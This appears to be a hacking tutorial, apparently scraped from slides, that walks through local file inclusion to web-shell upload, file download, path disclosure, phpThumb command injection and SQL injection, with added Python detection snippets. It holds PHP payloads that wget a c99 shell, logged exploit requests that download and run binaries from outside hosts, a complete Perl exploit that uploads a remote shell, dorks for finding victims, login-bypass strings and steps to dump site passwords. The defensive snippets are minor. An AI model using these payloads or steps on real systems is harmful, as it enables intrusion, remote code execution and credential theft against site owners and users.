    Local file inclusion: 1) LFI? LFI can be used on sites like: Code: http://link.com/index.php?page= by adding Code: ../../../../../../etc/passwd (sometimes you have to add %00 on passwd). 2) Finding vulnerable sites: Code: index.php?page= index.php?option= search.php?word= 3) Checking site vulnerability: Find some site and use Code: ../../../../../../../../../../../etc/passwd or Code: ../../../../../../../../../../../etc/passwd%00 When you enter this to link you get this: Code: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian- exim:x:101:103::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false ntp:x:103:106::/home/ntp:/bin/false snmp:x:104:65534::/var/lib/snmp:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin which means that site is vulnerable. 4) proc/self/environ Now we want to see if we have access in /proc/self/environ over site so we can upload a shell on the site.
  • 6.
    Instead of etc/passwd%00we are going to put /proc/self/environ If page prints this: Code: DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2a d7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fpr oc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc% 2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster**website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE= Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Serv.......... then proc/self/environ is enabled so we can upload the shell. 5) Shell uploading To upload the shell we need Mozilla Firefox: Code: http://www.mozilla.com/firefox/ Add-on Tamper Data: Code: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ Open site etc: Code: http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/s elf/environ Tools > Tamper Data click Start Tamper then refresh page and in user agent put next code: Code: <?system('wget www.link.com/shell.txt -O shell.php');?> Click OK. To access shell use: Code:www.link.com/shell.php
  • 7.
    LFI 2 RCE Find LFI vulnerabel site.  Check its link.
  • 8.
     Do -> http://www.site.com/index.php?lien=../../../../../../../../../../../../pro c/self/environ Open command prompt and run script LFI2RCE.exe [C:lfi2rce.exe "< Website vuln link>"]
  • 9.
     Type Command-: id  Type Command -: uname -a  Type Command -: ls -l  Now Upload a "shell" in this web server so,  Type Command -: wget http://downlading-link-of-shell.com/c99.php or /c99.zip  Type Command -: unzip c99.txt.zip  Type Command -: mv c99.txt c99.php "OR" mv c99.txt Out14ws.php (where assuming "out14ws.php" is Public HTML page & move command will copy c99.txt Text to "opt14ws.php")  Type Command-: ls | grep Out14ws "OR " ls | grep c99  Type Command -: pwd [ To check present working directory of shell ]  Then open full link of your shell in yoyr web browse you get : http://website-name/path/path/c99.php http:// website-name/path/path/opt14ws.php.php
  • 11.
    LFI 2 RCEUsing Firefox  Check the target if it is vulnerable to lfi or not  Eg. http://www.site.com/index.php?page=../../../../../../../../etc/passwd -: or http://www.site.com/index.php?page=../../../../../../../../etc/passwd%00  Now. See -: http://www.site.com /index.php?page=../../../../../../proc/self/environ-: or http://www.site.com /index.php?page=../../../../../../proc/self/environ%00
  • 12.
     Now inaddress bar or firefox type : " about:config "  Find -: accessibility.browsewithcaret > rightclick > new > string  NEW STRING VALUE : general.useragent.override Press " Ok " new box will pop up ask for : ENTER STRING VALUE
  • 13.
     ENTER STRINGVALUE : <?php phpinfo(); ?> It is general.useragent.override After it u will see something like :
  • 14.
     Now checkthe php version and Information while refreshing the vulnerable link or page. Find disabled information -: disable_functions - system, passthru, shellexec, popen, escapshellcmd, proc_open etc...  Once u have checked the php info go to : " about:config " page and see for "general.useragent.override " and ENTER STRING VALUE :  <pre><?php exec('YOUR COMMAND',$result);foreach($result as $output){print "$outputn";}?></pre>  Behalf of - YOUR COMMAND - Type some command like - ls -a , uname -a, cd /etc/passwd, pwd, etc...  For uploading Shell You can type command : wget http://www.site.com/c99.php Note : after putting command for getting its output you have to refresh the page or vulnable link.
  • 15.
     Command -:ls -la  Output : On refreshing page
  • 16.
     Command :uname -a
  • 17.
    Local file download: 1) LFD? LFD (Local File Download) is vulnerability in script which is used to download files using GET method, but you can also use it with POST method using add-on Tamper Data. Code: http://site.com/download_file.php?file=notepad.exe 2) Vulnerable script Code: <?php if(isset($_POST['download'])) { $file = $_GET['file']; $file_info = pathinfo($file); header('Content-type: application/x-'.$file_info['extension']); header('Content-Disposition: attachment; filename='.$file_info['basename']); header('Content-Length: '.filesize($file)); readfile($file); exit; } ?> 3) Vulnerability check To check if script is vulnerable we are gonna try to download etc/passwd. So instead of: Code: http://site.com/download_file.php?file=notepad.exe We are gonna use: Code: http://site.com/download_file.php?file=../../../../../../../../../etc/passwd If it starts to download and if it open file in text editor it look something like this: Code: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin Script is vulnerable! NOTE: If it is a windows server use boot.ini instead of etc/passwd. 4) Exploiting vulnerability Now when we know that script is vulnerable, we want to see which files are on host. You can do this on this way: Code: http://site.com/download_file.php?filel=../
  • 18.
    ../ is gonnaback us one directory backward and download file. 1.1 It is possible when it download file and open in text editor to print file list in directories. 1.2 or it is either possible to download file but when it is opened in text editor file is empty. In case 1.1 we dont have to guess file name and directory and we can download whatever we want. In case 1.2 we must guess file name and directory and we can download only files which name we guess. There is a few program that can help us to find files (Acunetix and HTTrack Website Copier). 5) Protection script We have script mentioned at start: Code: <?php if(isset($_POST['download'])) { $file = $_GET['file']; $file_info = pathinfo($file); header('Content-type: application/x-'.$file_info['extension']); header('Content-Disposition: attachment; filename='.$file_info['basename']); header('Content-Length: '.filesize($file)); readfile($file); exit; } ?> by adding if(file_exists("download/".$file) we are gonna secure script. So it should look like: Code: <?php if(isset($_POST['download'])) { $file = $_GET['file']; $file_info = pathinfo($file); if(file_exists("download/".$file)) { header('Content-type: application/x-'.$file_info['extension']); header('Content-Disposition: attachment; filename='.$file_info['basename']); header('Content-Length: '.filesize($file)); readfile($file); exit; }
  • 19.
    Full path disclosure: This method let you over errors in file or over errors made by programmers to let you see which files are in which directories, over it you can't directly hack site, it just let you help while hacking. It is useful because it can help you in faster and easier hacking, also it can help you with Local File Inclusion (LFI), when folder name is changed, or some other file. You can findout using FPD. There is a lot of ways using FPD vulnerability on site, I'll explane you 2 most important. 1st is over array, by adding square brackets on link like this one: Code: index.php?page=home To finish vulnerability attack is to add [] on destined place: Code: index.php?page[]=home. That will give you error like this: Code: Warning: include(blah/errors.php) [function.include]: failed to open stream: No such file or directory /home/insekure/public_html/index.php on line 211 From this you can see on site is it exists directory blah. 2nd method is to add most used cookie (Null Session Cookie), and you can add him by Java- injection, by adding java code on site you will get error. This is a javascript code: Code: javascript:void(document.cookie='PHPSESSID='); add that in your address bar and hit enter, now when page is refreshed you will get this error: Code: Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/thems/errors.php on line 58 then try to open directory thems on site, that should list you files in that directory. Protection: Most simple way to protect from this attacks is to turn-off error reporting. edit or add: Code: error_reporting(0);
  • 20.
    Command Injection VulnerabilityExploit  phpThumb()"fltr[]" Command Injection Vulnerability Exploit Scans  Automatic Shell upload I. phpThumb() "fltr[]" Command Injection Vulnetability since the 21th of December 2011 we’ve identified over 300 attempts to exploit the phpThumb() 'fltr[]' Parameter Command Injection Vulnerability aka CVE-2010-1598 reported back in April 2010. Input passed via the "fltr[]" parameter to phpThumb.php is not properly sanitized before being used in a command line argument. This can be exploited to inject and execute arbitrary shell commands via specially crafted requests. Successful exploitation requires that "ImageMagick" is installed. The vulnerability is confirmed in version 1.7.9. Other versions may also be affected. This vulnerability can be exploited with "high_security_enabled" set to "true" by brute forcing the "high_security_password". Source: phpThumb() "fltr[]" Command Injection Vulnerability By appending a semi-colon to the "blur" option of the fltr parameter, the attacker is able to execute OS level commands as there aren't any input validation checks for the $command data in phpthumb.functions.php. 00.function ImageMagickThumbnailToGD() { 01.... 02.foreach ($this->fltr as $filterkey => $filtercommand) { 03.@list($command, $parameter) = explode('|', $filtercommand, 2); 04.switch ($command) { 05.... 06.case 'blur': 07.if ($this->ImageMagickSwitchAvailable('blur')) { 08.@list($radius) = explode('|', $parameter); 09.$radius = ($radius ? $radius : 1); 10.$commandline .= ' -blur '.$radius; 11.unset($this->fltr[$filterkey]); 12.} 13.break;
  • 21.
    14.... 15.$this->DebugMessage('ImageMagick called as ('.$commandline.')',__FILE__, __LINE__); 16.$IMresult = phpthumb_functions::SafeExec($commandline); 17.clearstatcache(); 18.if (@$IMtempSourceFilename && file_exists($IMtempSourceFilename)) { 19.@unlink($IMtempSourceFilename); 20.} 21.if (!@file_exists($IMtempfilename) || !@filesize($IMtempfilename)) { 22.$this->FatalError('ImageMagick failed with message ('.trim($IMresult).')'); 23.$this->DebugMessage('ImageMagick failed with message ('.trim($IMresult).')', __FILE__, __LINE__); 24.... 25.} The issue was first addressed in version 1.7.10 and in version 1.7.11 the author added even more explicit escaping of command line parameters according to the changelog. escapeshellarg The updated code uses the php escapeshellarg function and also limits the length of the input. 0.case 'blur': 1.if ($this->ImageMagickSwitchAvailable('blur')) { 2.@list($radius) = explode('|', $parameter); 3.$radius = (!empty($radius) ? min(max(intval($radius), 0), 25) : 1); 4.$commandline .= ' -blur '.escapeshellarg($radius); 5.$successfullyProcessedFilters[] = $filterkey; 6.} 7.break; The problem with these extensions is that they use dangerous PHP functions which have the potential to mess up a web hosting server and hack / exploit user accounts further up to root level.
Hackers who use an insecure PHP script as an entry point to a web hosting server can start unleashing dangerous commands and take control of the complete server quickly. Certain functions used in such scripts are considered dangerous and are turned off in the PHP configuration by responsible web hosts. (Un)fortunately escapeshellarg is often part of the disabled functions, so either way you can't win except by staying away from scripts that use these dangerous functions.

Find the location of your php.ini file. Open that file, look for "disable_functions" and replace it with the following line:

Code:
disable_functions = exec,system,passthru,readfile,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,popen,parse_ini_file,show_source,curl_exec

Source: Disabling dangerous PHP functions

3.5 php.ini & disabled functions

Code:
safe_mode = On
expose_php = Off
Enable_dl = Off
magic_quotes = On
register_globals = Off
display_errors = Off
disable_functions = system, show_source, symlink, exec, dl, shell_exec, passthru, phpinfo, escapeshellarg, escapeshellcmd

Source: How To: WHM/cPanel Hardening & Security - The Basics - Part 1

Exploit Scans

The queries are as follows:

Code:
GET /phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 HTTP/1.1
GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 HTTP/1.1
GET /manager/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; &phpThumbDebug=9 HTTP/1.1

Breakdown of the requests / commands:

Exploit the vulnerability in the phpThumb.php fltr[] parameter.
Code:
GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;

Display all information about files / directories - a long listing of the files in /tmp.

Code:
ls -l /tmp;

Download the file barbut6 from bingoooo.co.uk and write the output to the file /tmp/barbut6.

Code:
wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;

Default permissions are usually 0644; change the file permission to 0755 for owner / group / others so that the file can be executed.

Code:
chmod 0755 /tmp/barbut6;

Run / execute the file barbut6.

Code:
/tmp/barbut6;

The ps command gives a snapshot of the current processes. On most systems derived from BSD, ps commonly runs with the non-standard options aux, where "a" lists all processes on a terminal, including those of other users, "x" lists all processes without controlling terminals and "u" adds a column for the controlling user for each process. Note that, for maximum compatibility when using this syntax, there is no "-" in front of the "aux".

Code:
ps -aux;
Send SIGKILL to all perl processes. SIGKILL (signal number 9) is a forced shutdown of a process. Note that with SIGKILL the process will not have the opportunity to clean up any system resources it was using (e.g. temporary files).

Code:
killall -9 perl;

Start perl and run / execute the file f.

Code:
perl /tmp/f;

The output will be kept in the picture debug, created through the parameter phpThumbDebug=9.

Code:
&phpThumbDebug=9

IP List

List of IPs involved in the scans:

65.23.154.56
77.93.216.38
87.98.219.50
91.121.100.30
91.121.105.174
91.121.154.199
94.23.51.208
200.155.17.68

Targets

Code:
GET /cms/plugins/content/jthumbs/includes/phpThumb.php
GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php
GET /common/scripts/phpThumb/phpThumb.php
GET /phpThumb/phpThumb.php
GET /libs/phpThumb/phpThumb.php
GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php
GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php
GET /gallery/phpThumb/phpThumb.php
GET /wp-content/themes/victore/phpthumb/phpThumb.php
GET /wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php
GET /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php
GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php
GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php
GET /js/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
GET /mambots/editors/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
GET /admin/scripts/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
GET /modules/phpThumb/phpThumb.php
GET /lib/phpThumb/phpThumb.php
GET /manager/phpThumb/phpThumb.php
GET /thumb/phpThumb.php
GET /global/phpthumb/phpThumb.php
GET /components/com_hotornot2/phpthumb/phpThumb.php
GET /wp-content/themes/max/scripts/phpThumb/phpThumb.php
GET /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php
GET /staticfiles/phpThumb/phpThumb.php
GET /content/phpthumb/phpthumb.php
GET /class/phpthumb/phpThumb.php
GET /admin/phpThumb/phpThumb.php
GET /phpThumb.php
GET /admin/upload/phpThumb.php
GET /assets/components/phpthumb/phpThumb.php
GET /components/com_alphacontent/assets/phpthumb/phpThumb.php
GET /components/com_hotornot2/phpthumb/phpThumb.php
GET /components/com_alphauserpoints/assets/phpThumb/phpThumb.php
GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
GET /zadmin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php
GET /components/com_flexicontent/librairies/phpthumb/phpThumb.php
GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php

II. Automatic Shell Upload Perl Script

Note: Please change the c991.txt address to your own shell address.

Code:
#!/usr/bin/perl
# Exploit Title: phpThumb v. <= 1.7.9 Remote Command Injection (Automatic Shell Upload)
# Date: 09/09/2013
# Author: D35m0nd142
# Vendor Homepage: http://phpthumb.sourceforge.net/
# Tested on: phpThumb 1.7.9
# Enter the website in this form --> http://mobileworld24.pl/wpcontent/themes/mobileworld24/inc/phpThumb/

use LWP::UserAgent;
use HTTP::Request;

$target = $ARGV[0];
if($target eq '')
{
    print "======================================================\n";
    print "   phpThumb <= 1.7.9 Remote Command Injection exploit  \n";
    print "               (Automatic Shell Upload)                \n";
    print "                 created by D35m0nd142                 \n";
    print "======================================================\n";
    sleep(0.8);
    print "Usage: perl phpthumb.pl <target> \n";
    exit(1);
}

if ($target !~ /http:\/\//)
{
    $target = "http://$target";
}

#print "[*] Enter the address of your hosted TXT shell (ex: 'http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
#sleep(1);

print "======================================================\n";
print "   phpThumb <= 1.7.9 Remote Command Injection exploit  \n";
print "               (Automatic Shell Upload)                \n";
print "                 created by D35m0nd142                 \n";
print "======================================================\n";
sleep(1.1);
print "[*] Sending exploit ... \n";
sleep(1.1);

$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1');

#print "Enter the command to execute => ";
#$cmd = <STDIN>;

$website = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; wget kratos91.altervista.org/c991.txt -O c991.txt ; &phpThumbDebug=9";
$request = $agent->request(HTTP::Request->new(GET=>$website));

if ($request->is_success && ($request->content =~ /Malformed header from CGI/ || $request->content =~ /Saving to: / ))
{
    print "[+] Exploit sent with success. \n";
    sleep(1.4);
}
else
{
    print "[-] Exploit sent but probably the website is not vulnerable. \n";
    sleep(1.3);
}

print "[*] Controlling if the txt shell has been uploaded ...\n";
sleep(1.2);
$cwebsite = "$target/c991.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));

if ($creq->is_success && ($creq->content =~ /c99shell.php/ || $creq->content =~ /shell/ ))
{
    print "[+] Txt Shell uploaded :) \n";
    sleep(1);
    print "[*] Moving it to PHP format ... wait please ... \n";
    sleep(1.1);
    $mvwebsite = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv c991.txt shell.php ; &phpThumbDebug=9";
    $mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
    $cwebsite = "$target/shell.php";
    $c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));

    if($c2req->is_success && ($c2req->content =~ "/<b>Command execute</b></a> ::</b></p></td></tr/" || $c2req->content =~ /Safe-mode/ || $c2req->content =~ /c99shell/ || $c2req->content =~ /r57shell/ || $c2req->content =~ /uname -a/ || $c2req->content =~ /shell/ ))
    {
        print "[+] PHP Shell injected => '$cwebsite' :) \n";
        sleep(0.8);
        print "[*] Do you want to open it? (y/n) => ";
        $open = <STDIN>;
        if ($open == "y")
        {
            $firefox = "firefox $cwebsite";
            system($firefox);
        }
    }
    else
    {
        print "[-] Error while moving shell from Txt to Php :( \n";
        exit(1);
    }
}
else
{
    print "[-] Txt shell not uploaded. :( \n";
}
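To tie the exploit scans above to the 1.7.10+ fix, here is an added Python example (not part of the original page and not phpThumb's own code) that pulls the fltr[] values out of a request line, flags a blur radius that is not a plain integer, and shows what the hardened intval()/min()/max()/escapeshellarg() logic reduces the payload to. The request lines are constructed samples, the host name attacker.example is a placeholder, and shlex.quote() stands in for PHP's escapeshellarg().

```python
import re
import shlex
from urllib.parse import unquote_plus, urlsplit

MAX_BLUR = 25  # upper bound used by the 1.7.10+ blur handler quoted above

# Constructed request lines in the shape of the exploit scans above (attacker.example
# stands in for the download host; nothing here was captured from a real server).
SAMPLE_REQUESTS = [
    "GET /phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg "
    "jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/x attacker.example/x;chmod 0755 /tmp/x;/tmp/x; "
    "&phpThumbDebug=9 HTTP/1.1",
    "GET /gallery/phpThumb/phpThumb.php?src=img.jpg&fltr[]=blur%7C3 HTTP/1.1",
    "GET /phpThumb.php?src=img.jpg&fltr[]=blur|0&w=200 HTTP/1.1",
]

REQUEST_LINE = re.compile(r"^(GET|POST)\s+(.*?)\s+HTTP/\d\.\d$")


def php_intval(value: str) -> int:
    """Emulate PHP intval() on a string: the leading integer prefix, otherwise 0."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def php_empty(value: str) -> bool:
    """PHP empty() is true for '' and also for the string '0'."""
    return value in ("", "0")


def hardened_blur_argument(parameter: str) -> str:
    """Rebuild ' -blur <radius>' the way the 1.7.10+ code does.

    @list($radius) = explode('|', $parameter) takes the first pipe-separated field,
    the value is clamped to 0..25 after intval(), and escapeshellarg() is applied
    (shlex.quote() plays that role here).
    """
    radius = parameter.split("|", 1)[0]
    clamped = min(max(php_intval(radius), 0), MAX_BLUR) if not php_empty(radius) else 1
    return " -blur " + shlex.quote(str(clamped))


def fltr_values(request_line: str) -> list:
    """Return every URL-decoded fltr[] value from a GET/POST request line."""
    m = REQUEST_LINE.match(request_line.strip())
    if not m:
        return []
    query = urlsplit(m.group(2)).query
    values = []
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == "fltr[]":
            values.append(unquote_plus(value))
    return values


def analyze_request(request_line: str) -> dict:
    """Inspect one request: does any blur parameter carry more than a bare integer?

    A legitimate blur radius is a short integer; a parameter with spaces, a semicolon
    or option-like text is what the scans above send. phpThumbDebug=9 is noted
    separately because the scans use it to read back command output.
    """
    findings = {"suspicious": False, "debug": False, "hardened": []}
    m = REQUEST_LINE.match(request_line.strip())
    if m and "phpThumbDebug=" in urlsplit(m.group(2)).query:
        findings["debug"] = True
    for value in fltr_values(request_line):
        command, _, parameter = value.partition("|")  # explode('|', $filtercommand, 2)
        if command != "blur":
            continue
        if not re.fullmatch(r"\d{1,3}", parameter.strip()):
            findings["suspicious"] = True
        findings["hardened"].append(hardened_blur_argument(parameter))
    return findings


def scan_requests(lines) -> list:
    """Return the request lines whose blur filter does not look like an integer."""
    return [line for line in lines if analyze_request(line)["suspicious"]]


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(analyze_request(line), line[:60])
```

Note the third sample: a radius of "0" is "empty" to PHP, so the hardened code falls back to 1 rather than 0.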
MYSQL Injection :

1) Dorks

Code:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administrator_login.asp

I am going to use:

Code:
http://site.com/Admin_Login.asp

2) Logging in

Now you can find some site with these dorks and try to log in with:

Username: Admin
Password: password' or 1=1--

Instead of password' or 1=1 you can use one of these:

Code:
'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'

password' or 1=1 will confuse the server and let you log in. So if you are able to log in, the site is vulnerable and you will be able to use the admin panel.
SQL Injection :

1) SQL Injection?

SQL Injection is a type of web attack. The attacker uses a hole in the script to take all data from the database. Vulnerable sites are in the format:

Code:
http://www.link.com/index.php?id=

You can put anything else instead of index.

2) Finding vulnerable sites

The best way to find a vulnerable site is by using Google. We use these dorks to find sites:

Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=

3) Site vulnerability check

There are 2 ways to check if a site is vulnerable.

1st way, we have the link:

Code:
http://site.com/book.php?id=141

We add only ' at the end of the link, so we get this link:

Code:
http://site.com/book.php?id=141'

2nd way, we have the link:

Code:
http://site.com/book.php?id=141

We add +and+1=2-- at the end of the link, so we get:

Code:
http://site.com/book.php?id=141+and+1=2--

If some part of the page disappears (picture, text or something) or there is an error like (You have an error in your SQL syntax), the site is vulnerable.

4) Finding the number of columns

We can do it by using the function order by, on the link:

Code:
http://site.com/book.php?id=141

adding +order+by+5--

Code:
http://site.com/book.php?id=141+order+by+5--

If the page opens normally there are more than 5 columns. Let's try with 10.

Code:
http://site.com/book.php?id=141+order+by+10--

Now some part of the site disappeared, which means that there are more than 5 and fewer than 10 columns. Let's try 7.

Code:
http://site.com/book.php?id=141+order+by+7--

The page opens normally, which means that there are more than 7 and fewer than 10 columns. Let's try 8.

Code:
http://site.com/book.php?id=141+order+by+8--

On column 8 part of the site disappears, which means that there are 7 columns.

5) Finding vulnerable columns

Finding vulnerable columns is done with the function union select all; on the link (in this case) we add +union+select+all+1,2,3,4,5,6,7--

Code:
http://site.com/book.php?id=-141+union+select+all+1,2,3,4,5,6,7--

It is going to write numbers on the page (in this case 1 2 3 4 5 6 7), which means that data can be taken from any of these columns. We are going to take it from the second column.

6) Finding the database version

As I said, we are going to take data from the second column. Instead of the number 2 we put version() or @@version.

Code:
http://site.com/book.php?id=-141+union+select+all+1,@@version,3,4,5,6,7--

On the page, where the number 2 was, it will show the database version. If the database version is 4 we have to guess the names of the table and column, but if the database version is 5 we don't have to guess them. We have version 5.0.51a-24+lenny5, which means that we don't have to guess the table and column names.

7) Finding table names

If the database version is 4 you won't be able to find the names of the table and column, you have to guess them. If the database version is 5, skip this step.

Names of some possible tables:

Code:
admin
admins
user
users
member
members

Names of some possible columns:

Code:
username
uname
un
user
name
nick
password
pw
pwd
passwd

If the database version is 5 we can take the table name by doing the next step: instead of the number 2 we put group_concat(table_name) and after the number of the last column +from+information_schema.tables+where+table_schema=database()--

So we get this link:

Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()--

Instead of the number 2 it showed the table names, in this case date, book, users. We are going to take the columns from the users table.

8) Finding column names

We found the table name that we want and now we want to take the columns from it. Instead of group_concat(table_name) we put group_concat(column_name), and instead of +from+information_schema.tables+where+table_schema=database()-- we put +from+information_schema.columns+where+table_name=hex--, where instead of hex we have to put the table name encoded in hex. Go to:

Code:
http://www.string-functions.com/string-hex.aspx

Write the name of the table (in this case users) and we get the hex value 7573657273, so now we can see the columns:

Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=0x7573657273--

9) Taking data from columns

We got: id, name, surname, username, password, level. We need only username and password. Instead of group_concat(column_name) we put group_concat(username,0x3a,password); 0x3a is the hex code for ':' and separates the username from the password. Instead of +from+information_schema.columns+where+table_name=0x7573657273-- we put +from+users-- and we have the link:

Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+users--

and the result, e.g.:

Code:
sebrezovski:1533562
seratum:seratum
coach:53.21.1985.
biga:biga

which are the users and passwords from this site.

10) Filter bypassing

In case when you write union+select+all it says "not accessible", change it to UnIoN+sElEcT+aLl

On some sites the space is restricted, so you can put + or /**/ (/* starts a comment and */ ends it).

On some sites the database version is also restricted, so you can use unhex(hex(version()))

11) Site protection from SQL Injection

Just put this code in your script:

Code:
<?php
if (!is_numeric($_GET['id'])) {
    // Anything that is not a number (e.g. 141' or 141 and 1=2) is refused before it reaches the query
    echo 'This text is shown when someone tries to add \' or and+1=2';
    exit;
}
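The login bypass from the MYSQL Injection section and the id-based union extraction and is_numeric() protection from this section, side by side in an added Python/sqlite3 example (not code from the original page). The table contents are constructed sample data, and SQLite stands in for MySQL, so group_concat(username,0x3a,password) is written as group_concat(username||':'||password).

```python
import re
import sqlite3

# Constructed sample data standing in for a site's database (not taken from the page).
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'seratum', 'seratum');
CREATE TABLE book (id INTEGER PRIMARY KEY, title TEXT);
INSERT INTO book VALUES (141, 'Sample book');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, username: str, password: str) -> list:
    """Login check built by string concatenation, like the Admin_Login.asp form above.

    password = "password' or 1=1--" closes the quote, appends a tautology and comments
    out the rest, so the WHERE clause matches every row.
    """
    sql = "SELECT username FROM users WHERE username='%s' AND password='%s'" % (username, password)
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username: str, password: str) -> list:
    """Same query with bound parameters: the quote in the password is just data."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def book_vulnerable(conn, book_id: str) -> list:
    """Numeric id pasted straight into the query (the book.php?id= pattern above).

    id=141 and 1=2-- makes the row disappear (the vulnerability check in step 3);
    id=-141 union select ... from users-- returns the users table instead (step 9).
    """
    sql = "SELECT title FROM book WHERE id=%s" % book_id
    return [row[0] for row in conn.execute(sql)]


def book_safe(conn, book_id: str) -> list:
    """Step 11's is_numeric() idea plus a bound parameter.

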